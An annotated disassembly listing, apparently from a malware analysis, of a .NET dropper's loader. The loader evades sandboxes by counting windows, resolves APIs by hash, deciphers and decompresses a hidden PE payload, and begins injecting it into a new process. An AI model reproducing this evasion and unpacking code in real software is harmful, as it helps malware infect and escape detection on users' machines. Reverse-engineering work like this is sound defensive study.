seg000:00000340 68 CA 16 5D 38                    push    385D16CAh       ; EnumWindows
seg000:00000345 50                                push    eax
seg000:00000346 E8 BD FD FF FF                    call    getAPIAddress
seg000:0000034B FF D0                             call    eax
seg000:0000034D                   ;
seg000:0000034D                   ; Here we return from EnumWindows() and [EBP-8] contains the number of windows enumerated
seg000:0000034D                   ; It seems that some sandboxes have only a few windows to enumerate because
seg000:0000034D                   ; if there is only 0x15, 0x1C, 7 or 6 windows, we will terminate here !
seg000:0000034D F7 D7                             not     edi
seg000:0000034F 83 7D F8 15                       cmp     dword ptr [ebp-8], 15h ; [EBP-8] is the windows counter (Value = 0x5A in my XP VM)
seg000:00000353 74 2A                             jz      short loc_37F
seg000:00000355 81 C1 E5 00 00 00                 add     ecx, 0E5h ; 'Õ'
seg000:0000035B 83 7D F8 1C                       cmp     dword ptr [ebp-8], 1Ch
seg000:0000035F 74 1E                             jz      short loc_37F
seg000:00000361 01 C0                             add     eax, eax
seg000:00000363 83 7D F8 07                       cmp     dword ptr [ebp-8], 7
seg000:00000367 74 16                             jz      short loc_37F
seg000:00000369 0F AF DA                          imul    ebx, edx
seg000:0000036C EB 01                             jmp     short loc_36F
seg000:0000036E A7                                db 0A7h ; º
seg000:0000036F                   loc_36F:                                ; ...
seg000:0000036F 83 7D F8 06                       cmp     dword ptr [ebp-8], 6
seg000:00000373 74 0A                             jz      short loc_37F
seg000:00000375 09 C3                             or      ebx, eax
seg000:00000377 EB 01                             jmp     short loc_37A
seg000:00000379 6D                                db 6Dh
seg000:0000037A                   loc_37A:                                ; ...
seg000:0000037A EB 0E                             jmp     short loc_38A
seg000:0000037C 87                                db  87h ; ç
seg000:0000037D 7D                                db  7Dh ; }
seg000:0000037E D8                                db 0D8h ; Ï
seg000:0000037F                   loc_37F:                                ; ...
seg000:0000037F 89 C3                             mov     ebx, eax
seg000:00000381 B8 01 00 00 00                    mov     eax, 1          ; Return 1 ==> process will be terminated !
seg000:00000386 F7 D7                             not     edi
seg000:00000388 C9                                leave
seg000:00000389 C3                                retn                    ; ===> We will come back in 0x3B1 !
seg000:0000038A                   loc_38A:                                ; ...
seg000:0000038A 31 4D F0                          xor     [ebp-10h], ecx
seg000:0000038D 31 C0                             xor     eax, eax        ; Return 0 => we will live...
seg000:0000038F 01 CF                             add     edi, ecx
seg000:00000391 C9                                leave
seg000:00000392 C3                                retn                    ; ===> We will come back in 0x3B1 !
seg000:00000392                   sub_336         endp ; sp-analysis failed
seg000:00000393                   ;                             End of detectSandbox
seg000:00000393                   ; **************************************************************************
seg000:00000393
seg000:00000393
seg000:00000393
seg000:00000393
seg000:00000393
seg000:00000393                   ; **************************************************************************
seg000:00000393                   ;
seg000:00000393                   ; ======> Here is the real entry point !
seg000:00000393                   ;
seg000:00000393                   start:                                  ; ...
seg000:00000393 55                                push    ebp
seg000:00000394 89 E5                             mov     ebp, esp
seg000:00000396 81 EC 28 08 00 00                 sub     esp, 828h
seg000:0000039C C7 85 CC FC FF FF+                mov     dword ptr [ebp-334h], 0FFFFFFFFh
seg000:000003A6 11 C8                             adc     eax, ecx
seg000:000003A8 EB 02                             jmp     short loc_3AC
seg000:000003AA 1C 12                             dw 121Ch
seg000:000003AC                   loc_3AC:                                ; ...
seg000:000003AC E8 44 FF FF FF                    call    detectSandbox
seg000:000003B1 21 CE                             and     esi, ecx
seg000:000003B3 EB 02                             jmp     short loc_3B7
seg000:000003B5 2D 1B                             dw 1B2Dh
seg000:000003B7                   loc_3B7:                                ; ...
seg000:000003B7 83 F8 00                          cmp     eax, 0
seg000:000003BA 0F 85 AB 08 00 00                 jnz     loc_C6B         ; We are in a sandbox ==> ExitProcess () !
seg000:000003C0 81 E1 CC 00 00 00                 and     ecx, 0CCh
seg000:000003C6 6A 00                             push    0
seg000:000003C8 83 75 A8 6E                       xor     dword ptr [ebp-58h], 6Eh
seg000:000003CC EB 01                             jmp     short loc_3CF
seg000:000003CE E8                                db 0E8h
seg000:000003CF                   loc_3CF:                                ; ...
seg000:000003CF 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:000003D4 E8 40 FC FF FF                    call    getModuleHandle
seg000:000003D9 68 FD 49 87 C6                    push    0C68749FDh      ; GetModuleHandleW
seg000:000003DE 50                                push    eax
seg000:000003DF E8 24 FD FF FF                    call    getAPIAddress
seg000:000003E4 FF D0                             call    eax             ; ******* hModule = GetModuleHandleW ( NULL ); *******
seg000:000003E6 89 8D F0 F7 FF FF                 mov     [ebp-810h], ecx
seg000:000003EC 68 00 04 00 00                    push    400h            ; nSize
seg000:000003F1 F7 DF                             neg     edi
seg000:000003F3 8D 8D 18 F8 FF FF                 lea     ecx, [ebp-7E8h]
seg000:000003F9 87 95 F4 F7 FF FF                 xchg    edx, [ebp-80Ch]
seg000:000003FF 51                                push    ecx             ; lpFileName
seg000:00000400 42                                inc     edx
seg000:00000401 EB 02                             jmp     short loc_405
seg000:00000403 24 13                             and     al, 13h
seg000:00000405                   loc_405:                                ; ...
seg000:00000405 50                                push    eax             ; Module handle
seg000:00000406 4B                                dec     ebx
seg000:00000407 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:0000040C E8 08 FC FF FF                    call    getModuleHandle
seg000:00000411 68 72 53 DD 91                    push    91DD5372h       ; ******* GetModuleFileNameW ( hModule, lpFileName=[ebp-7E8h], nSize=400 );  *******
seg000:00000416 50                                push    eax
seg000:00000417 E8 EC FC FF FF                    call    getAPIAddress
seg000:0000041C FF D0                             call    eax
seg000:0000041E 13 BD A4 FC FF FF                 adc     edi, [ebp-35Ch]
seg000:00000424 6A 00                             push    0               ; hTemplateFile = NULL
seg000:00000426 21 F1                             and     ecx, esi
seg000:00000428 EB 02                             jmp     short loc_42C
seg000:0000042A 60                                db  60h ; `
seg000:0000042B 69                                db 69h
seg000:0000042C                   loc_42C:                                ; ...
seg000:0000042C 68 80 00 00 00                    push    80h ; 'Ç'       ; dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL
seg000:00000431 46                                inc     esi
seg000:00000432 6A 04                             push    4               ; dwCreationDisposition = OPEN_ALWAYS
seg000:00000434 01 5D FC                          add     [ebp-4], ebx
seg000:00000437 6A 00                             push    0               ; lpSecurityAttributes = NULL;
seg000:00000439 49                                dec     ecx
seg000:0000043A EB 01                             jmp     short loc_43D
seg000:0000043C 4C                                db 4Ch
seg000:0000043D                   loc_43D:                                ; ...
seg000:0000043D 6A 01                             push    1               ; dwShareMode = FILE_SHARE_READ
seg000:0000043F 31 CF                             xor     edi, ecx
seg000:00000441 68 00 00 00 80                    push    80000000h       ; dwDesiredAccess = GENERIC_READ
seg000:00000446 F7 D8                             neg     eax
seg000:00000448 EB 01                             jmp     short loc_44B
seg000:0000044A F2                                db 0F2h
seg000:0000044B                   loc_44B:                                ; ...
seg000:0000044B 8D 8D 18 F8 FF FF                 lea     ecx, [ebp-7E8h]
seg000:00000451 29 D3                             sub     ebx, edx
seg000:00000453 51                                push    ecx             ; lpFileName = [EBP-7E8h]
seg000:00000454 83 C8 32                          or      eax, 32h
seg000:00000457 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:0000045C E8 B8 FB FF FF                    call    getModuleHandle
seg000:00000461 68 EE 08 C0 E0                    push    0E0C008EEh      ; CreateFileW
seg000:00000466 50                                push    eax
seg000:00000467 E8 9C FC FF FF                    call    getAPIAddress
seg000:0000046C FF D0                             call    eax             ; ******* CreateFileW (); *******
seg000:0000046E 23 7D 9C                          and     edi, [ebp-64h]
seg000:00000471 83 F8 FF                          cmp     eax, 0FFFFFFFFh ; File opened ?
seg000:00000474 75 0D                             jnz     short file_opened
seg000:00000476                   ; ---------------------------------------------
seg000:00000476
seg000:00000476 87 95 A4 FC FF FF                 xchg    edx, [ebp-35Ch]
seg000:0000047C EB 03                             jmp     short locret_481
seg000:0000047E C9                                leave
seg000:0000047F C5 3B                             lds     edi, [ebx]
seg000:00000481                   locret_481:                             ; ...
seg000:00000481 C9                                leave
seg000:00000482 C3                                retn                    ; ==========> Can't open file, so can't retrieve Payload, so terminate !
seg000:00000483
seg000:00000483
seg000:00000483
seg000:00000483                   file_opened:                            ; ...
seg000:00000483 11 FB                             adc     ebx, edi
seg000:00000485 EB 02                             jmp     short loc_489
seg000:00000487 0C 96                             or      al, 96h
seg000:00000489                   loc_489:                                ; ...
seg000:00000489 89 85 24 FC FF FF                 mov     [ebp-3DCh], eax ; Storing file handle
seg000:0000048F 01 CB                             add     ebx, ecx
seg000:00000491 6A 00                             push    0
seg000:00000493 83 DF 34                          sbb     edi, 34h ; '4'
seg000:00000496 EB 03                             jmp     short loc_49B
seg000:00000498 61                                db  61h ; a
seg000:00000499 05 04                             db 5, 4
seg000:0000049B                   loc_49B:                                ; ...
seg000:0000049B FF B5 24 FC FF FF                 push    dword ptr [ebp-3DCh]
seg000:000004A1 F7 D6                             not     esi
seg000:000004A3 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:000004A8 E8 6C FB FF FF                    call    getModuleHandle
seg000:000004AD 68 23 EE EF B2                    push    0B2EFEE23h      ; GetFileSize
seg000:000004B2 50                                push    eax
seg000:000004B3 E8 50 FC FF FF                    call    getAPIAddress
seg000:000004B8 FF D0                             call    eax             ; ******* dwFileSize = GetFileSize ( hFile, NULL ); *******
seg000:000004BA 29 F9                             sub     ecx, edi
seg000:000004BC 89 85 30 FC FF FF                 mov     [ebp-3D0h], eax ; [ebp-3D0h] = fileSize
seg000:000004C2 1B BD C0 FC FF FF                 sbb     edi, [ebp-340h]
seg000:000004C8 6A 04                             push    4
seg000:000004CA 31 D7                             xor     edi, edx
seg000:000004CC EB 01                             jmp     short loc_4CF
seg000:000004CE C8                                db 0C8h
seg000:000004CF                   loc_4CF:                                ; ...
seg000:000004CF 68 00 10 00 00                    push    1000h
seg000:000004D4 F7 D0                             not     eax
seg000:000004D6 FF B5 30 FC FF FF                 push    dword ptr [ebp-3D0h]
seg000:000004DC 29 F3                             sub     ebx, esi
seg000:000004DE 6A 00                             push    0
seg000:000004E0 11 8D D8 F7 FF FF                 adc     [ebp-828h], ecx
seg000:000004E6 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:000004EB E8 29 FB FF FF                    call    getModuleHandle
seg000:000004F0 68 A9 A2 1A 06                    push    61AA2A9h        ; VirtualAlloc
seg000:000004F5 50                                push    eax
seg000:000004F6 E8 0D FC FF FF                    call    getAPIAddress
seg000:000004FB FF D0                             call    eax             ; ******* hMemory = VirtualAlloc (); *******
seg000:000004FD 81 EB BC 00 00 00                 sub     ebx, 0BCh ; '+'
seg000:00000503 89 85 3C FC FF FF                 mov     [ebp-3C4h], eax ; [ebp-3C4h] = hMemory
seg000:00000509 11 CE                             adc     esi, ecx
seg000:0000050B 6A 00                             push    0               ; lpOverlapped = NULL
seg000:0000050D 87 D9                             xchg    ebx, ecx
seg000:0000050F EB 02                             jmp     short loc_513
seg000:00000511 92                                db  92h ; Æ
seg000:00000512 8B                                db 8Bh
seg000:00000513                   loc_513:                                ; ...
seg000:00000513 8D 85 30 FC FF FF                 lea     eax, [ebp-3D0h] ; fileSize
seg000:00000519 43                                inc     ebx
seg000:0000051A 50                                push    eax             ; lpNumberOfBytesRead
seg000:0000051B 42                                inc     edx
seg000:0000051C EB 02                             jmp     short loc_520
seg000:0000051E 33 9E                             dw 9E33h
seg000:00000520                   loc_520:                                ; ...
seg000:00000520 FF B5 30 FC FF FF                 push    dword ptr [ebp-3D0h] ; nNumberOfBytesToRead
seg000:00000526 11 C7                             adc     edi, eax
seg000:00000528 FF B5 3C FC FF FF                 push    dword ptr [ebp-3C4h] ; lpBuffer
seg000:0000052E 49                                dec     ecx
seg000:0000052F EB 01                             jmp     short loc_532
seg000:00000531 56                                push    esi
seg000:00000532                   loc_532:                                ; ...
seg000:00000532 FF B5 24 FC FF FF                 push    dword ptr [ebp-3DCh] ; hFile = file handle
seg000:00000538 81 F2 DB 00 00 00                 xor     edx, 0DBh
seg000:0000053E EB 02                             jmp     short loc_542
seg000:00000540 74 74                             jz      short loc_5B6
seg000:00000542                   loc_542:                                ; ...
seg000:00000542 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:00000547 E8 CD FA FF FF                    call    getModuleHandle
seg000:0000054C 68 9B 46 D7 C5                    push    0C5D7469Bh      ; ReadFile
seg000:00000551 50                                push    eax
seg000:00000552 E8 B1 FB FF FF                    call    getAPIAddress
seg000:00000557 FF D0                             call    eax             ; ******* ReadFile (); *******
seg000:00000559 0D 8D 00 00 00                    or      eax, 8Dh
seg000:0000055E FF B5 24 FC FF FF                 push    dword ptr [ebp-3DCh] ; file handle
seg000:00000564 21 FF                             and     edi, edi
seg000:00000566 EB 01                             jmp     short loc_569
seg000:00000568 6B                                db 6Bh
seg000:00000569                   loc_569:                                ; ...
seg000:00000569 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:0000056E E8 A6 FA FF FF                    call    getModuleHandle
seg000:00000573 68 48 63 B0 BA                    push    0BAB06348h      ; CloseHandle
seg000:00000578 50                                push    eax
seg000:00000579 E8 8A FB FF FF                    call    getAPIAddress
seg000:0000057E FF D0                             call    eax             ; ******* CloseHandle ( hFile ); *******
seg000:00000580 42                                inc     edx
seg000:00000581
seg000:00000581
seg000:00000581                   ; ------------------------------------------------------------------
seg000:00000581                   ; Build a 20 bytes buffer in memory with a deciphering routine.
seg000:00000581                   ; ------------------------------------------------------------------
seg000:00000581
seg000:00000581 B8 56 CD D3 A0                    mov     eax, 0A0D3CD56h
seg000:00000586 83 65 B0 2E                       and     dword ptr [ebp-50h], 2Eh
seg000:0000058A B9 05 00 00 00                    mov     ecx, 5
seg000:0000058F 83 C7 64                          add     edi, 64h ; 'd'
seg000:00000592 EB 02                             jmp     short loc_596
seg000:00000594 66 D1                             db 66h, 0D1h
seg000:00000596                   loc_596:                                ; ...
seg000:00000596 8D 7D C4                          lea     edi, [ebp-3Ch]  ; EDI refers EBP-3C
seg000:00000599 F7 D2                             not     edx
seg000:0000059B EB 03                             jmp     short loc_5A0
seg000:0000059D 5B                                db  5Bh ; [
seg000:0000059E F6 63                             dw 63F6h
seg000:000005A0                   ;
seg000:000005A0                   ; Loop will fill [EDI]
seg000:000005A0                   ; ECX=5
seg000:000005A0                   ; EDI = [EBP-3Ch]
seg000:000005A0                   loc_5A0:                                ; ...
seg000:000005A0 4A                                dec     edx
seg000:000005A1 89 C2                             mov     edx, eax        ; EDX=0xA0D3CD56
seg000:000005A3 0F AF DA                          imul    ebx, edx
seg000:000005A6 C1 C2 07                          rol     edx, 7          ; ROL EDX,7
seg000:000005A9 87 DB                             xchg    ebx, ebx
seg000:000005AB 01 D0                             add     eax, edx        ; ADD EDX,EAX
seg000:000005AD F7 DE                             neg     esi
seg000:000005AF AB                                stosd                   ; EAX -> [ES:EDI]
seg000:000005B0 13 55 B8                          adc     edx, [ebp-48h]
seg000:000005B3 49                                dec     ecx
seg000:000005B4 75 EA                             jnz     short loc_5A0
seg000:000005B6                   ; At loop end, buffer [EBP-3Ch] contains :
seg000:000005B6                   ; A6 78 BA 0A AB CB F6 67 5E A1 5C 63 8F 50 AD 11 17 98 55 E8
seg000:000005B6                   ; It's not code !
seg000:000005B6                   ;
seg000:000005B6                   ; will proove to be :
seg000:000005B6                   ; - 8 bytes signature
seg000:000005B6                   ; - 4 bytes XOR key for compressed size of datas
seg000:000005B6                   ; - 4 bytes XOR key for uncompressed size of datas
seg000:000005B6                   ; - 4 bytes XOR key for deciphering key to decipher datas
seg000:000005B6                   ;
seg000:000005B6                   ; datas are the PE Payload hidden in a ressource
seg000:000005B6
seg000:000005B6
seg000:000005B6
seg000:000005B6                   ; ---------------------------------------------------------------------
seg000:000005B6                   ;  Now, look for the data hidden in a .net dropper executable resource
seg000:000005B6                   ;                 which is the ciphered and zipped PE Payload
seg000:000005B6                   ; ---------------------------------------------------------------------
seg000:000005B6
seg000:000005B6                   loc_5B6:                                ; ...
seg000:000005B6 81 6D FC 9F 00 00+                sub     dword ptr [ebp-4], 9Fh ; 'ƒ'
seg000:000005BD 8B 8D 30 FC FF FF                 mov     ecx, [ebp-3D0h] ; ECX = buffer size
seg000:000005C3 83 AD E8 F7 FF FF+                sub     dword ptr [ebp-818h], 43h ; 'C'
seg000:000005CA 83 E9 04                          sub     ecx, 4
seg000:000005CD 83 CE 59                          or      esi, 59h
seg000:000005D0 EB 02                             jmp     short loc_5D4
seg000:000005D2 27                                db  27h ; '
seg000:000005D3 A1                                db 0A1h
seg000:000005D4                   loc_5D4:                                ; ...
seg000:000005D4 8B B5 3C FC FF FF                 mov     esi, [ebp-3C4h] ; lpRead
seg000:000005DA                   loc_5DA:                                ; ...
seg000:000005DA F7 D7                             not     edi
seg000:000005DC                   ;
seg000:000005DC                   ; Loop begining
seg000:000005DC                   ; ECX = buffer size
seg000:000005DC                   ; ESI = buffer address
seg000:000005DC                   ;----------------------------------------
seg000:000005DC                   next4bytes:                             ; ...
seg000:000005DC 4A                                dec     edx
seg000:000005DD 8B 04 0E                          mov     eax, [esi+ecx]
seg000:000005E0 87 FB                             xchg    edi, ebx
seg000:000005E2 3B 45 C4                          cmp     eax, [ebp-3Ch]  ; [EBP-3Ch] 20 bytes signature and deciphering structure
seg000:000005E5 75 26                             jnz     short loc_60D
seg000:000005E7 92                                xchg    eax, edx        ; 4 bytes pattern founded !
seg000:000005E8 83 C1 04                          add     ecx, 4
seg000:000005EB 11 C2                             adc     edx, eax
seg000:000005ED EB 03                             jmp     short loc_5F2
seg000:000005EF F5                                db 0F5h ; §
seg000:000005F0 E1 4A                             db 0E1h, 4Ah
seg000:000005F2                   loc_5F2:                                ; ...
seg000:000005F2 8B 04 0E                          mov     eax, [esi+ecx]  ; EAX = contains the 4 bytes following pattern founded
seg000:000005F5 31 FA                             xor     edx, edi
seg000:000005F7 83 E9 04                          sub     ecx, 4          ; Going back on the 4 bytes founded (last ones processed)
seg000:000005FA 23 55 E4                          and     edx, [ebp-1Ch]
seg000:000005FD EB 02                             jmp     short loc_601
seg000:000005FF F1                                icebp
seg000:00000600 FB                                sti
seg000:00000601                   loc_601:                                ; ...
seg000:00000601 3B 45 C8                          cmp     eax, [ebp-38h]  ; Comparing the 4 next bytes with value 0x67F6CBAB
seg000:00000604 75 07                             jnz     short loc_60D
seg000:00000606 21 F7                             and     edi, esi
seg000:00000608 EB 15                             jmp     short signatureFound ; ==========> signature found !
seg000:0000060A 83 D0 40                          adc     eax, 40h ; '@'
seg000:0000060D                   loc_60D:                                ; ...
seg000:0000060D 11 F8                             adc     eax, edi
seg000:0000060F 49                                dec     ecx             ; Back one byte
seg000:00000610 75 CA                             jnz     short next4bytes ; Next 4 bytes please...
seg000:00000612
seg000:00000612
seg000:00000612
seg000:00000612 81 EA 97 00 00 00                 sub     edx, 97h ; 'ù'
seg000:00000618 E9 4E 06 00 00                    jmp     loc_C6B         ; =====> ExitProcess () !
seg000:0000061D 21 CB                             and     ebx, ecx
seg000:0000061F
seg000:0000061F                   ; ---------------------------------------------------------------------
seg000:0000061F                   ;  Signature found. Decipher the compressed buffer size, uncompress
seg000:0000061F                   ;                  buffer size and deciphering key
seg000:0000061F                   ; ---------------------------------------------------------------------
seg000:0000061F
seg000:0000061F                   signatureFound:                         ; ...
seg000:0000061F 19 CA                             sbb     edx, ecx
seg000:00000621 EB 02                             jmp     short loc_625
seg000:00000623 7D B5                             jge     short loc_5DA
seg000:00000625                   loc_625:                                ; ...
seg000:00000625 8B 45 CC                          mov     eax, [ebp-34h]  ; EAX=0x635CA15E
seg000:00000628 83 C3 0F                          add     ebx, 0Fh
seg000:0000062B 83 C1 08                          add     ecx, 8          ; Seek after the 4 bytes found and the 4 verified
seg000:0000062E 0F AF D1                          imul    edx, ecx
seg000:00000631 33 04 0E                          xor     eax, [esi+ecx]  ; EAX = 0x635CA15E ^ 0x635C112E = 0xB070
seg000:00000634 F7 D7                             not     edi
seg000:00000636 EB 01                             jmp     short loc_639
seg000:00000638 F3                                db 0F3h
seg000:00000639                   loc_639:                                ; ...
seg000:00000639 89 45 EC                          mov     [ebp-14h], eax  ; 0xB070
seg000:0000063C 89 CF                             mov     edi, ecx
seg000:0000063E 8B 45 D0                          mov     eax, [ebp-30h]  ; EAX = 0x11AD508F ?
seg000:00000641 0F AF DE                          imul    ebx, esi
seg000:00000644 83 C1 04                          add     ecx, 4          ; 4 bytes forward
seg000:00000647 4F                                dec     edi
seg000:00000648 33 04 0E                          xor     eax, [esi+ecx]  ; EAX = 0x11AD508F ^ 0x11ADAA8F = 0xFA00
seg000:0000064B 47                                inc     edi
seg000:0000064C EB 03                             jmp     short loc_651
seg000:0000064E DA 20                             fisub   dword ptr [eax]
seg000:00000650 FB                                sti
seg000:00000651                   loc_651:                                ; ...
seg000:00000651 89 45 F4                          mov     [ebp-0Ch], eax  ; 0xFA00
seg000:00000654 F7 D2                             not     edx
seg000:00000656 8B 45 D4                          mov     eax, [ebp-2Ch]  ; EAX = 0xE8559817
seg000:00000659 BA E1 00 00 00                    mov     edx, 0E1h ; 'ß'
seg000:0000065E 83 C1 04                          add     ecx, 4          ; 4 bytes forward
seg000:00000661 F7 DF                             neg     edi
seg000:00000663 33 04 0E                          xor     eax, [esi+ecx]  ; EAX = 0xE8559817 ^ 0x48865541 = 0xA0D3CD56
seg000:00000666 F7 D7                             not     edi
seg000:00000668 89 45 E0                          mov     [ebp-20h], eax  ; EAX = 0xA0D3CD56 ?
seg000:0000066B 0F AF DA                          imul    ebx, edx
seg000:0000066E
seg000:0000066E                   ; ---------------------------------------------------------------------
seg000:0000066E                   ;             Ok, now decipher the compress PE payload
seg000:0000066E                   ; ---------------------------------------------------------------------
seg000:0000066E
seg000:0000066E 89 F0                             mov     eax, esi        ; EAX = buffer that contains executable readed
seg000:00000670 19 F2                             sbb     edx, esi
seg000:00000672 01 C8                             add     eax, ecx
seg000:00000674 0F AF FF                          imul    edi, edi
seg000:00000677 83 C0 04                          add     eax, 4          ; EAX refers 12 octets after the 8 of signature in the buffer that contains the executable (.net dropper), offset 0xD343 of exe
seg000:0000067A 4A                                dec     edx
seg000:0000067B 89 85 44 FC FF FF                 mov     [ebp-3BCh], eax ; [EBP-3BCh] refers buffer that will be deciphered and unzipped
seg000:00000681 49                                dec     ecx
seg000:00000682 EB 02                             jmp     short loc_686
seg000:00000684 63 31                             db 63h, 31h
seg000:00000686                   loc_686:                                ; ...
seg000:00000686 FF 75 E0                          push    dword ptr [ebp-20h] ; 0xA0D3CD56
seg000:00000689 46                                inc     esi
seg000:0000068A FF 75 EC                          push    dword ptr [ebp-14h] ; 0xB070 ? Buffer size
seg000:0000068D 40                                inc     eax
seg000:0000068E FF B5 44 FC FF FF                 push    dword ptr [ebp-3BCh] ; Readed file content
seg000:00000694 4E                                dec     esi
seg000:00000695 E8 B4 FB FF FF                    call    bufferDecipher
seg000:0000069A
seg000:0000069A
seg000:0000069A                   ; ---------------------------------------------------------------------
seg000:0000069A                   ;     Then, allocate a memory block for uncompressed PE Payload and
seg000:0000069A                   ;       uncompress deciphered and still compress PE Payload in it
seg000:0000069A                   ; ---------------------------------------------------------------------
seg000:0000069A
seg000:0000069A 31 CA                             xor     edx, ecx
seg000:0000069C 6A 04                             push    4
seg000:0000069E 0F AF C6                          imul    eax, esi
seg000:000006A1 EB 03                             jmp     short loc_6A6
seg000:000006A3 BA                                db 0BAh
seg000:000006A4 98                                db  98h ; ÿ
seg000:000006A5 09                                db 9
seg000:000006A6                   loc_6A6:                                ; ...
seg000:000006A6 68 00 10 00 00                    push    1000h
seg000:000006AB 1B 4D BC                          sbb     ecx, [ebp-44h]
seg000:000006AE FF 75 F4                          push    dword ptr [ebp-0Ch] ; 0xFA00
seg000:000006B1 33 85 E4 F7 FF FF                 xor     eax, [ebp-81Ch]
seg000:000006B7 EB 02                             jmp     short loc_6BB
seg000:000006B9 1E                                push    ds
seg000:000006BA F0                                lock
seg000:000006BB                   loc_6BB:                                ; ...
seg000:000006BB 6A 00                             push    0
seg000:000006BD 93                                xchg    eax, ebx
seg000:000006BE 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:000006C3 E8 51 F9 FF FF                    call    getModuleHandle
seg000:000006C8 68 A9 A2 1A 06                    push    61AA2A9h        ; VirtualAlloc
seg000:000006CD 50                                push    eax
seg000:000006CE E8 35 FA FF FF                    call    getAPIAddress
seg000:000006D3 FF D0                             call    eax             ; ******* VirtualAlloc (); *******
seg000:000006D5 49                                dec     ecx
seg000:000006D6 89 85 4C FC FF FF                 mov     [ebp-3B4h], eax ; buffer address to store unzipped datas
seg000:000006DC 0F AF F6                          imul    esi, esi
seg000:000006DF EB 03                             jmp     short loc_6E4
seg000:000006E1 5C                                pop     esp
seg000:000006E2 B6 6A                             mov     dh, 6Ah ; 'j'
seg000:000006E4                   loc_6E4:                                ; ...
seg000:000006E4 8D 85 58 FC FF FF                 lea     eax, [ebp-3A8h]
seg000:000006EA 19 F1                             sbb     ecx, esi
seg000:000006EC 50                                push    eax             ; FinalUncompressedSize
seg000:000006ED 33 9D 00 F8 FF FF                 xor     ebx, [ebp-800h]
seg000:000006F3 EB 01                             jmp     short loc_6F6
seg000:000006F5 AD                                lodsd
seg000:000006F6                   loc_6F6:                                ; ...
seg000:000006F6 FF 75 EC                          push    dword ptr [ebp-14h] ; CompressedBufferSize
seg000:000006F9 42                                inc     edx
seg000:000006FA EB 01                             jmp     short loc_6FD
seg000:000006FC 0E                                push    cs
seg000:000006FD                   loc_6FD:                                ; ...
seg000:000006FD FF B5 44 FC FF FF                 push    dword ptr [ebp-3BCh] ; CompressedBuffer
seg000:00000703 13 5D BC                          adc     ebx, [ebp-44h]
seg000:00000706 FF 75 F4                          push    dword ptr [ebp-0Ch] ; UnCompressedBufferSize
seg000:00000709 C7 85 F0 F7 FF FF+                mov     dword ptr [ebp-810h], 82h ; 'é'
seg000:00000713 FF B5 4C FC FF FF                 push    dword ptr [ebp-3B4h] ; UnCompressedBuffer = [EBP-3B4h]
seg000:00000719 6B FF 26                          imul    edi, 26h
seg000:0000071C 6A 02                             push    2               ; COMPRESSION_FORMAT_LZNT1
seg000:0000071E 87 BD 28 FC FF FF                 xchg    edi, [ebp-3D8h]
seg000:00000724 68 A2 03 1E EA                    push    0EA1E03A2h      ; 'Ntdll.dll'
seg000:00000729 E8 EB F8 FF FF                    call    getModuleHandle
seg000:0000072E 68 0D 4B 74 54                    push    54744B0Dh       ; RtlDecompressBuffer
seg000:00000733 50                                push    eax
seg000:00000734 E8 CF F9 FF FF                    call    getAPIAddress
seg000:00000739 FF D0                             call    eax             ; ******* RtlDecompressBuffer(); *******
seg000:0000073B 09 C3                             or      ebx, eax
seg000:0000073D 3D 00 00 00 80                    cmp     eax, 80000000h
seg000:00000742 72 42                             jb      short loc_786
seg000:00000744
seg000:00000744                   ; ---------------------------------------------------------------------
seg000:00000744                   ;                  If there is a problem, terminate !
seg000:00000744                   ; ---------------------------------------------------------------------
seg000:00000744
seg000:00000744 31 8D A8 FC FF FF                 xor     [ebp-358h], ecx
seg000:0000074A EB 03                             jmp     short loc_74F
seg000:0000074C 2E 19 5C                          db 2Eh, 19h, 5Ch
seg000:0000074F                   loc_74F:                                ; ...
seg000:0000074F 3D 42 02 00 C0                    cmp     eax, 0C0000242h
seg000:00000754 74 30                             jz      short loc_786
seg000:00000756 69 F6 C0 00 00 00                 imul    esi, 0C0h
seg000:0000075C 6A 00                             push    0
seg000:0000075E 81 F3 E9 00 00 00                 xor     ebx, 0E9h
seg000:00000764 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:00000769 E8 AB F8 FF FF                    call    getModuleHandle
seg000:0000076E 68 83 62 4C CE                    push    0CE4C6283h      ; ExitProcess
seg000:00000773 50                                push    eax
seg000:00000774 E8 8F F9 FF FF                    call    getAPIAddress
seg000:00000779 FF D0                             call    eax             ; ==========> This is the end !
seg000:0000077B 81 CF C5 00 00 00                 or      edi, 0C5h
seg000:00000781 EB 03                             jmp     short loc_786
seg000:00000783 DC 7F 68                          fdivr   qword ptr [edi+68h]
seg000:00000786
seg000:00000786                   ; ---------------------------------------------------------------------
seg000:00000786                   ;                         PE Payload ready in memory !
seg000:00000786                   ;                   Create a process, fill it and launch it
seg000:00000786                   ; ---------------------------------------------------------------------
seg000:00000786
seg000:00000786                   loc_786:                                ; ...
seg000:00000786 29 F0                             sub     eax, esi
seg000:00000788 68 00 40 00 00                    push    4000h
seg000:0000078D 89 D8                             mov     eax, ebx
seg000:0000078F FF B5 30 FC FF FF                 push    dword ptr [ebp-3D0h]
seg000:00000795 29 D9                             sub     ecx, ebx
seg000:00000797 FF B5 3C FC FF FF                 push    dword ptr [ebp-3C4h]
seg000:0000079D F7 D2                             not     edx
seg000:0000079F 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:000007A4 E8 70 F8 FF FF                    call    getModuleHandle
seg000:000007A9 68 54 87 30 A8                    push    0A8308754h      ; VirtualFree
seg000:000007AE 50                                push    eax
seg000:000007AF E8 54 F9 FF FF                    call    getAPIAddress
seg000:000007B4 FF D0                             call    eax
seg000:000007B6 13 85 00 F8 FF FF                 adc     eax, [ebp-800h]
seg000:000007BC EB 02                             jmp     short loc_7C0
seg000:000007BE 26 9B                             dw 9B26h
seg000:000007C0                   loc_7C0:                                ; ...
seg000:000007C0 6A 10                             push    10h             ; Length
seg000:000007C2 83 D7 48                          adc     edi, 48h ; 'H'
seg000:000007C5 8D 85 B0 FC FF FF                 lea     eax, [ebp-350h]
seg000:000007CB 83 E2 1F                          and     edx, 1Fh
